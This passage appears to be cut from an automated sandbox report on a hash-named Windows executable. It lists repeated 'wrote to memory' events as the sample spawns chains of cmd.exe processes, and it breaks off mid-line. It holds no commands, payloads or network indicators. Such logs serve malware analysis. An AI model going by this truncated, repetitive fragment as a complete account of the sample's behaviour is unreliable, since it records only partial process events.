c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 351 PID 1796 wrote to memory of 1464 1796 cmd.exe 353 PID 1796 wrote to memory of 1464 1796 cmd.exe 353 PID 1796 wrote to memory of 1464 1796 cmd.exe 353 PID 1796 wrote to memory of 1464 1796 cmd.exe 353 PID 1796 wrote to memory of 1188 1796 cmd.exe 354 PID 1796 wrote to memory of 1188 1796 cmd.exe 354 PID 1796 wrote to memory of 1188 1796 cmd.exe 354 PID 1796 wrote to memory of 1188 1796 cmd.exe 354 PID 1796 wrote to memory of 1944 1796 cmd.exe 355 PID 1796 wrote to memory of 1944 1796 cmd.exe 355 PID 1796 wrote to memory of 1944 1796 cmd.exe 355 PID 1796 wrote to memory of 1944 1796 cmd.exe 355 PID 1944 wrote to memory of 1460 1944 cmd.exe 356 PID 1944 wrote to memory of 1460 1944 cmd.exe 356 PID 1944 wrote to memory of 1460 1944 cmd.exe 356 PID 1944 wrote to memory of 1460 1944 cmd.exe 356 PID 1796 wrote to memory of 336 1796 cmd.exe 357 PID 1796 wrote to memory of 336 1796 cmd.exe 357 PID 1796 wrote to memory of 336 1796 cmd.exe 357 PID 1796 wrote to memory of 336 1796 cmd.exe 357 PID 1836 wrote to memory of 1580 1836 taskeng.exe 358 PID 1836 wrote to memory of 1580 1836 taskeng.exe 358 PID 1836 wrote to memory of 1580 1836 taskeng.exe 358 PID 1436 wrote to memory of 1724 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 359 PID 1436 wrote to memory of 1724 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 359 PID 1436 wrote to memory of 1724 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 359 PID 1436 wrote to memory of 1724 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 359 PID 1724 wrote to memory of 1480 1724 cmd.exe 361 PID 1724 wrote to memory of 1480 1724 cmd.exe 361 PID 1724 wrote to memory of 1480 1724 cmd.exe 361 PID 1724 wrote to memory of 1480 1724 cmd.exe 361 PID 1724 wrote to memory of 1652 1724 cmd.exe 362 PID 1724 wrote to memory of 1652 1724 cmd.exe 362 PID 1724 wrote to memory of 1652 1724 cmd.exe 362 PID 1724 wrote to memory of 1652 1724 cmd.exe 362 PID 1724 wrote to memory of 788 1724 cmd.exe 363 PID 1724 wrote to memory of 788 1724 cmd.exe 363 PID 1724 wrote to memory of 788 1724 cmd.exe 363 PID 1724 wrote to memory of 788 1724 cmd.exe 363 PID 788 wrote to memory of 1528 788 cmd.exe 364 PID 788 wrote to memory of 1528 788 cmd.exe 364 PID 788 wrote to memory of 1528 788 cmd.exe 364 PID 788 wrote to memory of 1528 788 cmd.exe 364 PID 1724 wrote to memory of 1824 1724 cmd.exe 365 PID 1724 wrote to memory of 1824 1724 cmd.exe 365 PID 1724 wrote to memory of 1824 1724 cmd.exe 365 PID 1724 wrote to memory of 1824 1724 cmd.exe 365 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 366 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 366 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 366 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 366 PID 1428 wrote to memory of 1848 1428 cmd.exe 368 PID 1428 wrote to memory of 1848 1428 cmd.exe 368 PID 1428 wrote to memory of 1848 1428 cmd.exe 368 PID 1428 wrote to memory of 1848 1428 cmd.exe 368 PID 1428 wrote to memory of 1400 1428 cmd.exe 369 PID 1428 wrote to memory of 1400 1428 cmd.exe 369 PID 1428 wrote to memory of 1400 1428 cmd.exe 369 PID 1428 wrote to memory of 1400 1428 cmd.exe 369 PID 1428 wrote to memory of 1816 1428 cmd.exe 370 PID 1428 wrote to memory of 1816 1428 cmd.exe 370 PID 1428 wrote to memory of 1816 1428 cmd.exe 370 PID 1428 wrote to memory of 1816 1428 cmd.exe 370 PID 1816 wrote to memory of 1880 1816 cmd.exe 371 PID 1816 wrote to memory of 1880 1816 cmd.exe 371 PID 1816 wrote to memory of 1880 1816 cmd.exe 371 PID 1816 wrote to memory of 1880 1816 cmd.exe 371 PID 1428 wrote to memory of 1536 1428 cmd.exe 372 PID 1428 wrote to memory of 1536 1428 cmd.exe 372 PID 1428 wrote to memory of 1536 1428 cmd.exe 372 PID 1428 wrote to memory of 1536 1428 cmd.exe 372 PID 1436 wrote to memory of 1020 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 373 PID 1436 wrote to memory of 1020 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 373 PID 1436 wrote to memory of 1020 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 373 PID 1436 wrote to memory of 1020 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 373 PID 1020 wrote to memory of 1548 1020 cmd.exe 375 PID 1020 wrote to memory of 1548 1020 cmd.exe 375 PID 1020 wrote to memory of 1548 1020 cmd.exe 375 PID 1020 wrote to memory of 1548 1020 cmd.exe 375 PID 1020 wrote to memory of 1768 1020 cmd.exe 376 PID 1020 wrote to memory of 1768 1020 cmd.exe 376 PID 1020 wrote to memory of 1768 1020 cmd.exe 376 PID 1020 wrote to memory of 1768 1020 cmd.exe 376 PID 1020 wrote to memory of 604 1020 cmd.exe 377 PID 1020 wrote to memory of 604 1020 cmd.exe 377 PID 1020 wrote to memory of 604 1020 cmd.exe 377 PID 1020 wrote to memory of 604 1020 cmd.exe 377 PID 604 wrote to memory of 1036 604 cmd.exe 378 PID 604 wrote to memory of 1036 604 cmd.exe 378 PID 604 wrote to memory of 1036 604 cmd.exe 378 PID 604 wrote to memory of 1036 604 cmd.exe 378 PID 1020 wrote to memory of 1500 1020 cmd.exe 380 PID 1020 wrote to memory of 1500 1020 cmd.exe 380 PID 1020 wrote to memory of 1500 1020 cmd.exe 380 PID 1020 wrote to memory of 1500 1020 cmd.exe 380 PID 1436 wrote to memory of 1832 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 381 PID 1436 wrote to memory of 1832 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 381 PID 1436 wrote to memory of 1832 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 381 PID 1436 wrote to memory of 1832 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 381 PID 1832 wrote to memory of 1480 1832 cmd.exe 383 PID 1832 wrote to memory of 1480 1832 cmd.exe 383 PID 1832 wrote to memory of 1480 1832 cmd.exe 383 PID 1832 wrote to memory of 1480 1832 cmd.exe 383 PID 1832 wrote to memory of 284 1832 cmd.exe 384 PID 1832 wrote to memory of 284 1832 cmd.exe 384 PID 1832 wrote to memory of 284 1832 cmd.exe 384 PID 1832 wrote to memory of 284 1832 cmd.exe 384 PID 1832 wrote to memory of 1196 1832 cmd.exe 385 PID 1832 wrote to memory of 1196 1832 cmd.exe 385 PID 1832 wrote to memory of 1196 1832 cmd.exe 385 PID 1832 wrote to memory of 1196 1832 cmd.exe 385 PID 1196 wrote to memory of 1528 1196 cmd.exe 386 PID 1196 wrote to memory of 1528 1196 cmd.exe 386 PID 1196 wrote to memory of 1528 1196 cmd.exe 386 PID 1196 wrote to memory of 1528 1196 cmd.exe 386 PID 1580 wrote to memory of 1440 1580 cmd.exe 387 PID 1580 wrote to memory of 1440 1580 cmd.exe 387 PID 1580 wrote to memory of 1440 1580 cmd.exe 387 PID 1832 wrote to memory of 1860 1832 cmd.exe 388 PID 1832 wrote to memory of 1860 1832 cmd.exe 388 PID 1832 wrote to memory of 1860 1832 cmd.exe 388 PID 1832 wrote to memory of 1860 1832 cmd.exe 388 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 389 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 389 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 389 PID 1436 wrote to memory of 932 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 389 PID 932 wrote to memory of 612 932 cmd.exe 391 PID 932 wrote to memory of 612 932 cmd.exe 391 PID 932 wrote to memory of 612 932 cmd.exe 391 PID 932 wrote to memory of 612 932 cmd.exe 391 PID 932 wrote to memory of 924 932 cmd.exe 392 PID 932 wrote to memory of 924 932 cmd.exe 392 PID 932 wrote to memory of 924 932 cmd.exe 392 PID 932 wrote to memory of 924 932 cmd.exe 392 PID 932 wrote to memory of 1864 932 cmd.exe 393 PID 932 wrote to memory of 1864 932 cmd.exe 393 PID 932 wrote to memory of 1864 932 cmd.exe 393 PID 932 wrote to memory of 1864 932 cmd.exe 393 PID 1864 wrote to memory of 816 1864 cmd.exe 394 PID 1864 wrote to memory of 816 1864 cmd.exe 394 PID 1864 wrote to memory of 816 1864 cmd.exe 394 PID 1864 wrote to memory of 816 1864 cmd.exe 394 PID 932 wrote to memory of 748 932 cmd.exe 395 PID 932 wrote to memory of 748 932 cmd.exe 395 PID 932 wrote to memory of 748 932 cmd.exe 395 PID 932 wrote to memory of 748 932 cmd.exe 395 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 396 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 396 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 396 PID 1436 wrote to memory of 520 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 396 PID 520 wrote to memory of 1444 520 cmd.exe 398 PID 520 wrote to memory of 1444 520 cmd.exe 398 PID 520 wrote to memory of 1444 520 cmd.exe 398 PID 520 wrote to memory of 1444 520 cmd.exe 398 PID 520 wrote to memory of 1460 520 cmd.exe 399 PID 520 wrote to memory of 1460 520 cmd.exe 399 PID 520 wrote to memory of 1460 520 cmd.exe 399 PID 520 wrote to memory of 1460 520 cmd.exe 399 PID 520 wrote to memory of 1036 520 cmd.exe 400 PID 520 wrote to memory of 1036 520 cmd.exe 400 PID 520 wrote to memory of 1036 520 cmd.exe 400 PID 520 wrote to memory of 1036 520 cmd.exe 400 PID 1036 wrote to memory of 1080 1036 cmd.exe 401 PID 1036 wrote to memory of 1080 1036 cmd.exe 401 PID 1036 wrote to memory of 1080 1036 cmd.exe 401 PID 1036 wrote to memory of 1080 1036 cmd.exe 401 PID 520 wrote to memory of 1748 520 cmd.exe 402 PID 520 wrote to memory of 1748 520 cmd.exe 402 PID 520 wrote to memory of 1748 520 cmd.exe 402 PID 520 wrote to memory of 1748 520 cmd.exe 402 PID 1436 wrote to memory of 432 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 403 PID 1436 wrote to memory of 432 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 403 PID 1436 wrote to memory of 432 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 403 PID 1436 wrote to memory of 432 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 403 PID 432 wrote to memory of 1056 432 cmd.exe 405 PID 432 wrote to memory of 1056 432 cmd.exe 405 PID 432 wrote to memory of 1056 432 cmd.exe 405 PID 432 wrote to memory of 1056 432 cmd.exe 405 PID 432 wrote to memory of 284 432 cmd.exe 406 PID 432 wrote to memory of 284 432 cmd.exe 406 PID 432 wrote to memory of 284 432 cmd.exe 406 PID 432 wrote to memory of 284 432 cmd.exe 406 PID 432 wrote to memory of 1804 432 cmd.exe 407 PID 432 wrote to memory of 1804 432 cmd.exe 407 PID 432 wrote to memory of 1804 432 cmd.exe 407 PID 432 wrote to memory of 1804 432 cmd.exe 407 PID 1804 wrote to memory of 1972 1804 cmd.exe 408 PID 1804 wrote to memory of 1972 1804 cmd.exe 408 PID 1804 wrote to memory of 1972 1804 cmd.exe 408 PID 1804 wrote to memory of 1972 1804 cmd.exe 408 PID 432 wrote to memory of 820 432 cmd.exe 409 PID 432 wrote to memory of 820 432 cmd.exe 409 PID 432 wrote to memory of 820 432 cmd.exe 409 PID 432 wrote to memory of 820 432 cmd.exe 409 PID 1436 wrote to memory of 1724 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 410 PID 1436 wrote to memory of 1724 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 410 PID 1436 wrote to memory of 1724 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 410 PID 1436 wrote to memory of 1724 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 410 PID 1724 wrote to memory of 544 1724 cmd.exe 412 PID 1724 wrote to memory of 544 1724 cmd.exe 412 PID 1724 wrote to memory of 544 1724 cmd.exe 412 PID 1724 wrote to memory of 544 1724 cmd.exe 412 PID 1724 wrote to memory of 1572 1724 cmd.exe 413 PID 1724 wrote to memory of 1572 1724 cmd.exe 413 PID 1724 wrote to memory of 1572 1724 cmd.exe 413 PID 1724 wrote to memory of 1572 1724 cmd.exe 413 PID 1724 wrote to memory of 1312 1724 cmd.exe 414 PID 1724 wrote to memory of 1312 1724 cmd.exe 414 PID 1724 wrote to memory of 1312 1724 cmd.exe 414 PID 1724 wrote to memory of 1312 1724 cmd.exe 414 PID 1312 wrote to memory of 1164 1312 cmd.exe 415 PID 1312 wrote to memory of 1164 1312 cmd.exe 415 PID 1312 wrote to memory of 1164 1312 cmd.exe 415 PID 1312 wrote to memory of 1164 1312 cmd.exe 415 PID 1724 wrote to memory of 1536 1724 cmd.exe 416 PID 1724 wrote to memory of 1536 1724 cmd.exe 416 PID 1724 wrote to memory of 1536 1724 cmd.exe 416 PID 1724 wrote to memory of 1536 1724 cmd.exe 416 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 417 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 417 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 417 PID 1436 wrote to memory of 1428 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 417 PID 1428 wrote to memory of 1848 1428 cmd.exe 419 PID 1428 wrote to memory of 1848 1428 cmd.exe 419 PID 1428 wrote to memory of 1848 1428 cmd.exe 419 PID 1428 wrote to memory of 1848 1428 cmd.exe 419 PID 1428 wrote to memory of 1768 1428 cmd.exe 420 PID 1428 wrote to memory of 1768 1428 cmd.exe 420 PID 1428 wrote to memory of 1768 1428 cmd.exe 420 PID 1428 wrote to memory of 1768 1428 cmd.exe 420 PID 1428 wrote to memory of 316 1428 cmd.exe 421 PID 1428 wrote to memory of 316 1428 cmd.exe 421 PID 1428 wrote to memory of 316 1428 cmd.exe 421 PID 1428 wrote to memory of 316 1428 cmd.exe 421 PID 316 wrote to memory of 1796 316 cmd.exe 422 PID 316 wrote to memory of 1796 316 cmd.exe 422 PID 316 wrote to memory of 1796 316 cmd.exe 422 PID 316 wrote to memory of 1796 316 cmd.exe 422 PID 1428 wrote to memory of 1080 1428 cmd.exe 423 PID 1428 wrote to memory of 1080 1428 cmd.exe 423 PID 1428 wrote to memory of 1080 1428 cmd.exe 423 PID 1428 wrote to memory of 1080 1428 cmd.exe 423 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 424 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 424 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 424 PID 1436 wrote to memory of 1248 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 424 PID 1248 wrote to memory of 1548 1248 cmd.exe 426 PID 1248 wrote to memory of 1548 1248 cmd.exe 426 PID 1248 wrote to memory of 1548 1248 cmd.exe 426 PID 1248 wrote to memory of 1548 1248 cmd.exe 426 PID 1248 wrote to memory of 996 1248 cmd.exe 427 PID 1248 wrote to memory of 996 1248 cmd.exe 427 PID 1248 wrote to memory of 996 1248 cmd.exe 427 PID 1248 wrote to memory of 996 1248 cmd.exe 427 PID 1248 wrote to memory of 1056 1248 cmd.exe 428 PID 1248 wrote to memory of 1056 1248 cmd.exe 428 PID 1248 wrote to memory of 1056 1248 cmd.exe 428 PID 1248 wrote to memory of 1056 1248 cmd.exe 428 PID 1056 wrote to memory of 284 1056 cmd.exe 429 PID 1056 wrote to memory of 284 1056 cmd.exe 429 PID 1056 wrote to memory of 284 1056 cmd.exe 429 PID 1056 wrote to memory of 284 1056 cmd.exe 429 PID 1248 wrote to memory of 1288 1248 cmd.exe 430 PID 1248 wrote to memory of 1288 1248 cmd.exe 430 PID 1248 wrote to memory of 1288 1248 cmd.exe 430 PID 1248 wrote to memory of 1288 1248 cmd.exe 430 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 431 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 431 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 431 PID 1436 wrote to memory of 1488 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 431 PID 1488 wrote to memory of 1752 1488 cmd.exe 433 PID 1488 wrote to memory of 1752 1488 cmd.exe 433 PID 1488 wrote to memory of 1752 1488 cmd.exe 433 PID 1488 wrote to memory of 1752 1488 cmd.exe 433 PID 1488 wrote to memory of 364 1488 cmd.exe 434 PID 1488 wrote to memory of 364 1488 cmd.exe 434 PID 1488 wrote to memory of 364 1488 cmd.exe 434 PID 1488 wrote to memory of 364 1488 cmd.exe 434 PID 1488 wrote to memory of 544 1488 cmd.exe 435 PID 1488 wrote to memory of 544 1488 cmd.exe 435 PID 1488 wrote to memory of 544 1488 cmd.exe 435 PID 1488 wrote to memory of 544 1488 cmd.exe 435 PID 544 wrote to memory of 1572 544 cmd.exe 436 PID 544 wrote to memory of 1572 544 cmd.exe 436 PID 544 wrote to memory of 1572 544 cmd.exe 436 PID 544 wrote to memory of 1572 544 cmd.exe 436 PID 1488 wrote to memory of 1164 1488 cmd.exe 437 PID 1488 wrote to memory of 1164 1488 cmd.exe 437 PID 1488 wrote to memory of 1164 1488 cmd.exe 437 PID 1488 wrote to memory of 1164 1488 cmd.exe 437 PID 1436 wrote to memory of 816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 438 PID 1436 wrote to memory of 816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 438 PID 1436 wrote to memory of 816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 438 PID 1436 wrote to memory of 816 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 438 PID 816 wrote to memory of 944 816 cmd.exe 440 PID 816 wrote to memory of 944 816 cmd.exe 440 PID 816 wrote to memory of 944 816 cmd.exe 440 PID 816 wrote to memory of 944 816 cmd.exe 440 PID 816 wrote to memory of 1728 816 cmd.exe 441 PID 816 wrote to memory of 1728 816 cmd.exe 441 PID 816 wrote to memory of 1728 816 cmd.exe 441 PID 816 wrote to memory of 1728 816 cmd.exe 441 PID 816 wrote to memory of 1848 816 cmd.exe 442 PID 816 wrote to memory of 1848 816 cmd.exe 442 PID 816 wrote to memory of 1848 816 cmd.exe 442 PID 816 wrote to memory of 1848 816 cmd.exe 442 PID 1848 wrote to memory of 1768 1848 cmd.exe 443 PID 1848 wrote to memory of 1768 1848 cmd.exe 443 PID 1848 wrote to memory of 1768 1848 cmd.exe 443 PID 1848 wrote to memory of 1768 1848 cmd.exe 443 PID 816 wrote to memory of 1268 816 cmd.exe 444 PID 816 wrote to memory of 1268 816 cmd.exe 444 PID 816 wrote to memory of 1268 816 cmd.exe 444 PID 816 wrote to memory of 1268 816 cmd.exe 444 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 445 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 445 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 445 PID 1436 wrote to memory of 1032 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 445 PID 1032 wrote to memory of 748 1032 cmd.exe 447 PID 1032 wrote to memory of 748 1032 cmd.exe 447 PID 1032 wrote to memory of 748 1032 cmd.exe 447 PID 1032 wrote to memory of 748 1032 cmd.exe 447 PID 1032 wrote to memory of 1608 1032 cmd.exe 448 PID 1032 wrote to memory of 1608 1032 cmd.exe 448 PID 1032 wrote to memory of 1608 1032 cmd.exe 448 PID 1032 wrote to memory of 1608 1032 cmd.exe 448 PID 1032 wrote to memory of 1548 1032 cmd.exe 449 PID 1032 wrote to memory of 1548 1032 cmd.exe 449 PID 1032 wrote to memory of 1548 1032 cmd.exe 449 PID 1032 wrote to memory of 1548 1032 cmd.exe 449 PID 1548 wrote to memory of 996 1548 cmd.exe 450 PID 1548 wrote to memory of 996 1548 cmd.exe 450 PID 1548 wrote to memory of 996 1548 cmd.exe 450 PID 1548 wrote to memory of 996 1548 cmd.exe 450 PID 1032 wrote to memory of 1960 1032 cmd.exe 451 PID 1032 wrote to memory of 1960 1032 cmd.exe 451 PID 1032 wrote to memory of 1960 1032 cmd.exe 451 PID 1032 wrote to memory of 1960 1032 cmd.exe 451 PID 1436 wrote to memory of 1804 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 452 PID 1436 wrote to memory of 1804 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 452 PID 1436 wrote to memory of 1804 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 452 PID 1436 wrote to memory of 1804 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 452 PID 1804 wrote to memory of 2020 1804 cmd.exe 454 PID 1804 wrote to memory of 2020 1804 cmd.exe 454 PID 1804 wrote to memory of 2020 1804 cmd.exe 454 PID 1804 wrote to memory of 2020 1804 cmd.exe 454 PID 1804 wrote to memory of 936 1804 cmd.exe 455 PID 1804 wrote to memory of 936 1804 cmd.exe 455 PID 1804 wrote to memory of 936 1804 cmd.exe 455 PID 1804 wrote to memory of 936 1804 cmd.exe 455 PID 1804 wrote to memory of 1752 1804 cmd.exe 456 PID 1804 wrote to memory of 1752 1804 cmd.exe 456 PID 1804 wrote to memory of 1752 1804 cmd.exe 456 PID 1804 wrote to memory of 1752 1804 cmd.exe 456 PID 1752 wrote to memory of 364 1752 cmd.exe 457 PID 1752 wrote to memory of 364 1752 cmd.exe 457 PID 1752 wrote to memory of 364 1752 cmd.exe 457 PID 1752 wrote to memory of 364 1752 cmd.exe 457 PID 1804 wrote to memory of 1880 1804 cmd.exe 458 PID 1804 wrote to memory of 1880 1804 cmd.exe 458 PID 1804 wrote to memory of 1880 1804 cmd.exe 458 PID 1804 wrote to memory of 1880 1804 cmd.exe 458 PID 1436 wrote to memory of 1220 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 459 PID 1436 wrote to memory of 1220 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 459 PID 1436 wrote to memory of 1220 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 459 PID 1436 wrote to memory of 1220 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 459 PID 1220 wrote to memory of 1652 1220 cmd.exe 461 PID 1220 wrote to memory of 1652 1220 cmd.exe 461 PID 1220 wrote to memory of 1652 1220 cmd.exe 461 PID 1220 wrote to memory of 1652 1220 cmd.exe 461 PID 1220 wrote to memory of 1292 1220 cmd.exe 462 PID 1220 wrote to memory of 1292 1220 cmd.exe 462 PID 1220 wrote to memory of 1292 1220 cmd.exe 462 PID 1220 wrote to memory of 1292 1220 cmd.exe 462 PID 1220 wrote to memory of 944 1220 cmd.exe 463 PID 1220 wrote to memory of 944 1220 cmd.exe 463 PID 1220 wrote to memory of 944 1220 cmd.exe 463 PID 1220 wrote to memory of 944 1220 cmd.exe 463 PID 944 wrote to memory of 1728 944 cmd.exe 464 PID 944 wrote to memory of 1728 944 cmd.exe 464 PID 944 wrote to memory of 1728 944 cmd.exe 464 PID 944 wrote to memory of 1728 944 cmd.exe 464 PID 1220 wrote to memory of 872 1220 cmd.exe 465 PID 1220 wrote to memory of 872 1220 cmd.exe 465 PID 1220 wrote to memory of 872 1220 cmd.exe 465 PID 1220 wrote to memory of 872 1220 cmd.exe 465 PID 1436 wrote to memory of 1188 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 467 PID 1436 wrote to memory of 1188 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 467 PID 1436 wrote to memory of 1188 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 467 PID 1436 wrote to memory of 1188 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 467 PID 1188 wrote to memory of 1528 1188 cmd.exe 469 PID 1188 wrote to memory of 1528 1188 cmd.exe 469 PID 1188 wrote to memory of 1528 1188 cmd.exe 469 PID 1188 wrote to memory of 1528 1188 cmd.exe 469 PID 1188 wrote to memory of 1548 1188 cmd.exe 470 PID 1188 wrote to memory of 1548 1188 cmd.exe 470 PID 1188 wrote to memory of 1548 1188 cmd.exe 470 PID 1188 wrote to memory of 1548 1188 cmd.exe 470 PID 1188 wrote to memory of 284 1188 cmd.exe 471 PID 1188 wrote to memory of 284 1188 cmd.exe 471 PID 1188 wrote to memory of 284 1188 cmd.exe 471 PID 1188 wrote to memory of 284 1188 cmd.exe 471 PID 284 wrote to memory of 1428 284 cmd.exe 472 PID 284 wrote to memory of 1428 284 cmd.exe 472 PID 284 wrote to memory of 1428 284 cmd.exe 472 PID 284 wrote to memory of 1428 284 cmd.exe 472 PID 1188 wrote to memory of 1972 1188 cmd.exe 473 PID 1188 wrote to memory of 1972 1188 cmd.exe 473 PID 1188 wrote to memory of 1972 1188 cmd.exe 473 PID 1188 wrote to memory of 1972 1188 cmd.exe 473 PID 1436 wrote to memory of 2020 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 474 PID 1436 wrote to memory of 2020 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 474 PID 1436 wrote to memory of 2020 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 474 PID 1436 wrote to memory of 2020 1436 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe 474 PID 2020 wrote to memory of 1400 2020 cmd.exe 477 PID 2020 wrote to memory of 1400 2020 cmd.exe 477 PID 2020 wrote to memory of 1400 2020 cmd.exe 477 PID 2020 wrote to memory of 1400 2020 cmd.exe 477 PID 2020 wrote to memory of 1880 2020 cmd.exe 478 PID 2020 wrote to memory of 1880 2020 cmd.exe 478 PID 2020 wrote to memory of 1880 2020 cmd.exe 478 PID 2020 wrote to memory of 1880 2020 cmd.exe 478 PID 2020 wrote to memory of 1804 2020 cmd.exe 479 PID 2020 wrote to memory of 1804 2020 cmd.exe 479 PID 2020 wrote to memory 